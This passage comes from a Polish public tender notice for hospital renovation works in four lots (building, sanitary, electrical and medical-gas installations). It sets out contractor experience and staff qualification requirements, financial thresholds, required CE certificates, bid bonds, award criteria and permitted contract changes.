wykładzin podłogowych z tworzyw sztucznych, wykonywaniu prac malarskich, montażu stolarki okiennej i drzwiowej przy czym jedna z tych robót realizowana była dla potrzeb służby zdrowia (z wykorzystaniem wzoru  załącznik nr 9 do SIWZ)

Dla zadania nr 2 - Branża sanitarna
Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty, tj. wykonał co najmniej 1 robotę budowlaną w specjalności sanitarnej, przez którą zamawiający będzie rozumiał prace w zakresie instalacji sanitarnych i wentylacyjno  klimatyzacyjnych o wartości min.  1.000.000,- PLN brutto, wykonaną w obiekcie służby zdrowia (z wykorzystaniem wzoru  załącznik nr 9 do SIWZ)

Dla zadania nr 3 - Branża elektryczna
Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty, tj. wykonał co najmniej 1 robotę budowlaną w specjalności elektrycznej, przez którą zamawiający będzie rozumiał kompleksowo wykonane  prace  elektryczne wraz z robotami poinstalacyjnymi o wartości min.  1.000.000,- PLN brutto, wykonane w czynnym obiekcie służby zdrowia tj bez wyłączenia z funkcjonowania całego oddziału, a jedynie pojedynczych pomieszczeń na czas wykonania robót (z wykorzystaniem wzoru  załącznik nr 9 do SIWZ)

Dla zadania nr 4 - Branża gazy medyczne wraz z elementami branży elektrycznej
Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty, tj. wykonał co najmniej 1 robotę budowlaną w specjalności gazy medyczne, przez którą zamawiający będzie rozumiał prace  instalacyjne dla gazów medycznych wraz z dostawą urządzeń  wyposażenia sal operacyjnych o wartości min. 1.400.000,-PLN brutto, wykonane w obiekcie służby zdrowia, które uzyskały certyfikat wyrobu medycznego (z wykorzystaniem wzoru  załącznik nr 9 do SIWZ)

Dla zadania nr 1 - Branża budowlana

Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, 
odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz in-formacją o podstawie do dysponowania tymi osobami tj.: kierownika robót budowla-nych  posiadającego co najmniej wykształcenie wyższe w specjalności budownictwo ogólne lub równorzędne dla uzyskania uprawnień budowlanych w ww. wymaganej spe-cjalności i w wyniku ukończenia studiów wyższych uzyskał uprawnienia budowlane w specjalności konstrukcyjno budowlanej w zakresie kierowania i nadzorowania robót i posiada je co najmniej 5 lat i w tym czasie kierował co najmniej jeden raz wykonaniem robót ogólnobudowlanych o charakterze remontowym, oraz aktualnie przynależy do izby inżynierów budownictwa (z wykorzystaniem wzoru  załącznik nr 10 do SIWZ)



Dla zadania nr 2 - Branża sanitarna

Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj.: kierownika robót sanitarnych posiadającego co najmniej wykształcenie wyższe w specjalności sanitarnej lub równorzędne uprawniające do uzyskania uprawnień budowlanych w specjalności wewnętrznych instalacji sanitarnych w tym instalacji wentylacyjno  klimatyzacyjnych i w wyniku ukończenia studiów wyższych uzyskał takie uprawnienia budowlane i posiada je co najmniej 5 lat i w tym czasie kierował co najmniej jeden raz wykonaniem robót sanitarnych, wentylacji i klimatyzacji w obiektach służby zdrowia, oraz aktualnie przynależy do izby inżynierów budownictwa. (z wykorzystaniem wzoru  załącznik nr 10 do SIWZ),

Dla zadania nr 3 - Branża elektryczna
Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj.: kierownika robót elektrycznych  posiadającego wykształcenie wyższe w specjalności elektrycznej lub równorzędne uprawniające do uzyskania uprawnień budowlanych w wymaganej specjalności i w wyniku ukończenia studiów wyższych uzyskał takie uprawnienia budowlane w specjalności elektrycznej i posiada je co 
najmniej 5 lat i w tym czasie kierowała co najmniej jeden raz wykonywaniem robót elektrycznych w obiektach służby zdrowia, posiada aktualne uprawnienia dozorowe 
(grupa D)  i eksploatacyjne (grupa E) dla urządzeń energetycznych, oraz aktualnie przynależy do izby inżynierów budownictwa (z wykorzystaniem wzoru  załącznik nr 10 do SIWZ),

Dla zadania nr 4 - Branża gazy medyczne wraz z elementami branży elektrycznej
Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj.: kierownika robót sanitarnych posiadającego co najmniej wykształcenie wyższe w specjalności sanitarnej lub 
równorzędne uprawniające do uzyskania uprawnień budowlanych 
w specjalności wewnętrznych instalacji sanitarnych w tym instalacji 
gazowych i w wyniku ukończenia studiów wyższych uzyskał takie 
uprawnienia budowlane i posiada je co najmniej 5 lat i w tym czasie 
kierował co najmniej jeden raz wykonywaniem robót, instalacji gazów medycznych, w obiektach służby zdrowia i  instalacja ta uzyskała  status wyrobu medycznego, oraz aktualnie przynależy do izby inżynierów budownictwa.
(z wykorzystaniem wzoru  załącznik nr 10 do SIWZ)
oraz
kierownika robót elektrycznych  posiadającego wykształcenie wyższe w specjalności elektrycznej lub równorzędne uprawniające do uzyskania uprawnień budowlanych w wymaganej specjalności i w wyniku ukończenia studiów wyższych uzyskał takie uprawnienia budowlane w specjalności elektrycznej i posiada je co 
najmniej 5 lat i w tym czasie kierowała co najmniej jeden raz wykonywaniem robót elektrycznych w czynnych obiektach służby zdrowia, posiada aktualne uprawnienia dozorowe (grupa D)  i eksploatacyjne (grupa E) dla urządzeń energetycznych, oraz aktualnie przynależy do izby inżynierów budownictwa (z wykorzystaniem wzoru  załącznik nr 10 do SIWZ)
W celu zapewnienia odpowiedniego przebiegu postępowania Zamawiający zastrzega możliwość skorzystania z art. 26 ust. 2f ustawy Pzp w zakresie ww. dokumentu.

Dla zadania nr 1 - Branża budowlana
Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w kwocie min.  500.000,- PLN, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert. 

Dla zadania nr 2 - Branża sanitarna
Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w kwocie min.  1.000.000,- PLN, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert.

Dla zadania nr 3 - Branża elektryczna
Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w kwocie min.  200.000,- PLN, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert.

Dla zadania nr 4 - Branża gazy medyczne wraz z elementami branży elektrycznej
Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w kwocie min.  1.000.000,- PLN, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert.




<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Kolumny anestezjologiczne - Deklaracja zgodności i certyfikat CE producenta potwierdzające, że Urządzenie jest  zakwalifikowane do wyrobów medycznych klasy Ilb.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Kolumny anestezjologiczne - rysunek fabryczny producenta kolumn z wyposażeniem oraz proponowanym rozłożeniem gniazd prądowych, teletechnicznych i gazów medycznych.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Kolumny anestezjologiczne z ramieniem do płukania - Deklaracja zgodności i certyfikat CE producenta, potwierdzające, że Urządzenie jest zakwalifikowane do wyrobów medycznych klasy Ilb.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Kolumny chirurgiczne - Deklaracja zgodności i certyfikat CE producenta opisujący konkretny typ i model urządzenia, potwierdzające, że Urządzenie jest zakwalifikowane do wyrobów medycznych klasy Ilb.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Kolumny chirurgiczne - rysunek fabryczny producenta kolumn z wyposażeniem oraz proponowanym rozłożeniem gniazd prądowych, teletechnicznych i gazów medycznych.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Lampy operacyjne z monitorami i kamerami wraz z systemem przetwarzania i nagrywania obrazu dla 4 sal operacyjnych - Monitor medyczny 93/42/EEC  Deklaracja CE potwierdzająca, że monitor jest wyrobem medycznym klasy I.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Lampy operacyjne z monitorami i kamerami wraz z systemem przetwarzania i nagrywania obrazu dla 4 sal operacyjnych - Tablet do sterowania funkcjami lampy  instrukcja.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Lampy operacyjne z monitorami i kamerami wraz z systemem przetwarzania i nagrywania obrazu dla 4 sal operacyjnych - Medyczny system przetwarzania obrazu. Umożliwiający jednoczesną dystrybucję sygnałów cyfrowych  instrukcja.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Lampy operacyjne z monitorami i kamerami wraz z systemem przetwarzania i nagrywania obrazu dla 4 sal operacyjnych - Medyczny system nagrywania oraz archiwizacji obrazu oraz dokumentacji medycznej instrukcja.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Lampy operacyjne z monitorami i kamerami wraz z systemem przetwarzania i nagrywania obrazu dla 4 sal operacyjnych - Tablet do sterowania funkcjami medycznego systemu przetwarzania obrazu oraz archiwizacji obrazu wraz ze stacją dokującą-  instrukcja.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Lampy operacyjne z monitorami i kamerami wraz z systemem przetwarzania i nagrywania obrazu dla 4 sal operacyjnych - Deklaracja zgodności wytwórcy klasy I zgodnie z 93/42/EEC.(urządzenia oferowane)
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ  Lampy operacyjne z monitorami i kamerami wraz z systemem przetwarzania i nagrywania obrazu dla 4 sal operacyjnych - Katalogi i/lub ulotki informacyjne producenta dotyczące oferowanego typu wyrobu medycznego w języku polskim.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Lampa operacyjna - Deklaracja zgodności wytwórcy dla wyrobu medycznego klasy I zgodnie z 93/42/EEC.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Oczyszczone miedziane rury do gazów medycznych - Aprobata CE dla wyrobu medycznego zgodnie  z 93/42/EEC dla układu.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Oczyszczone miedziane rury do gazów medycznych - Materiały potwierdzający oferowane parametry techniczne w języku polskim (prospekt urządzenia, folder, katalog).
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Oczyszczone miedziane rury do gazów medycznych - Deklaracja właściwości użytkowych.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Oczyszczone miedziane rury do gazów medycznych - Deklaracja zgodności wytwórcy potwierdzająca model i typ opisany w niniejszym formularzu (model i typ musi zostać potwierdzony w materiałach potwierdzających parametry).
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Oczyszczone miedziane rury do gazów medycznych - Potwierdzenie zgłoszenia do URPL.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Sygnalizatory gazów medycznych - Certyfikat CE dla wyrobu medycznego zgodnie z 93/42/EEC dla urządzenia.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Sygnalizatory gazów medycznych -Materiały potwierdzający oferowane parametry techniczne w języku polskim (prospekt urządzenia, folder, katalog).
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Sygnalizatory gazów medycznych -Deklaracja zgodności wytwórcy potwierdzająca model i typ opisany w niniejszym formularzu (model i typ musi zostać potwierdzony w materiałach potwierdzających parametry).
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Sygnalizatory gazów medycznych - Potwierdzenie zgłoszenia/powiadomienia do URPLWMIPB.
Dotyczy zadania nr 4  Załącznik nr 8 do SIWZ - Sygnalizatory gazów medycznych - dokumenty potwierdzające autoryzację serwisu przez wytwórcę.

</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wypełniony formularz ofertowy  załącznik nr 1
Zobowiązanie (jeżeli dotyczy)
Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia powinno uwzględniać następujące informacje dotyczące:
1)  zakresu dostępnych wykonawcy zasobów innego podmiotu;
2) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;
3) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
4) czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu
do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.

Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w ust. 7.3 niniejszego rozdziału SIWZ.

Postanowienia dotyczące Wykonawców, którzy mają siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej stosuje się odpowiednio.

Oryginał lub poświadczona notarialnie kopia dokumentu potwierdzającego uprawnienia osób podpisujących ofertę (pełnomocnictwa), o ile nie wynikają one z przepisów prawa lub innych dokumentów rejestrowych załączonych do oferty
Potwierdzenie wpłaty wadium
Informacja o podwykonawcach  załącznik nr 2 (jeżeli dotyczy)
Zbiorcze zestawienie wartości robót załącznik nr 7.1-7.4 
Specyfikacje i wymogi dla urządzeń i materiałów  załącznik nr 8 (dotyczy tylko zadania nr 4)
Kosztorysy w wersji szczegółowej dla danego zadania (w którym składana jest oferta), tylko w wersji elektronicznej zapisane na płycie CD-ROM w pliku PDF i  ath .
Zakres prac do wykonania własnymi siłami   załącznik nr 15.1-15.4
Wykonawca, w terminie 3 dni od dnia przekazania informacji, o której mowa 
w art. 86 ust. 5 ustawy Pzp, zobowiązany jest przekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp (w oparciu o wzór załącznika nr 5 do SIWZ). Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />	Oferta musi być zabezpieczona wadium w wysokości: 
1)	Zadanie nr 1 48.000,00  zł
2)	Zadanie nr 2 26.000,00 zł.
3)	Zadanie nr 3  43.000,00. zł
4)	Zadanie nr 4  39.000,00. zł
Szczegółowe informacje - pkt 9 SIW.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  tak
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />Kosztorysy w wersji szczegółowej dla danego zadania (w którym składana jest oferta), tylko w wersji elektronicznej zapisane na płycie CD-ROM w pliku PDF i  ath .</div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>liczba pracowników zatrudnionych na umowę o pracę</td><td>30</td></tr><tr><td>najdłuższy termin gwarancji na wykonane roboty</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />2.	Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje zmiany postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w poniższym zakresie:
1)	zmiana terminów wykonania  umowy (rozpoczęcia lub zakończenia) lub terminów w harmonogramie robót w przypadku:
a)	zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowane: sytuacją finansową; zdolnościami płatniczymi, które nie były możliwe do przewidzenia w chwili zawarcia umowy, wstrzymaniem realizacji umowy przez Zamawiającego, nieterminowym przekazaniem terenu budowy, koniecznością wprowadzenia zmian w dokumentacji projektowej, w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót;
b)	zaistnienie okoliczności siły wyższej (wystąpienie zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć), w szczególności zagrażających bezpośrednio życiu lub zdrowiu ludzi lub grążących powstaniem szkody w znacznych rozmiarach,
c)	w przypadku działania osób trzecich uniemożliwiającego wykonanie prac, za które to działanie żadna ze Stron umowy nie ponosi odpowiedzialności,
d)	w przypadku zaistnienia warunków organizacyjnych uniemożliwiających prowadzenie zadania, w tym uniemożliwiających przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w terminach ustalonych w umowie,
e)	w przypadku działania organów administracji, w szczególności: odmowa albo zwłoka w wydaniu przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień; konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu umowy; konieczności uzyskania, niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów,
f) 	wystąpienie okoliczności o obiektywnym charakterze, których nie można było przewidzieć w chwili zawarcia Umowy, na przykład w przypadku wystąpienia robót dodatkowych lub zamówienia dodatkowego,
g) wniesienie przez Zamawiającego istotnej zmiany w dokumentacji projektowej, na podstawie której Wykonawca wykonuje przedmiot Umowy, wywołanej okolicznościami, których nie można było przewidzieć w chwili zawarcia Umowy,
h) gdy zmiana w sposób obiektywny jest uzasadniona potrzebami Zamawiającego, które poparte są interesem publicznym,
i) 	w przypadku wystąpienia robót zamiennych, których czas wykonania jest dłuższy w stosunku do robót podlegających zamianie,
j)	z powodu wystąpienia okoliczności uzasadniających zmianę sposobu wykonania przedmiotu umowy, o których mowa w pkt 2;
2) zmiana parametrów technicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu umowy, materiałów w następujących przypadkach:
a)	zaistnieje konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań niż wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
b)	zaistnieje konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań ze względu na zmiany obowiązującego prawa,
c)	wprowadzenie nowych rozwiązań technicznych z uwagi na postęp technologiczny, jeżeli zmiana ta jest korzystna dla Zamawiającego,
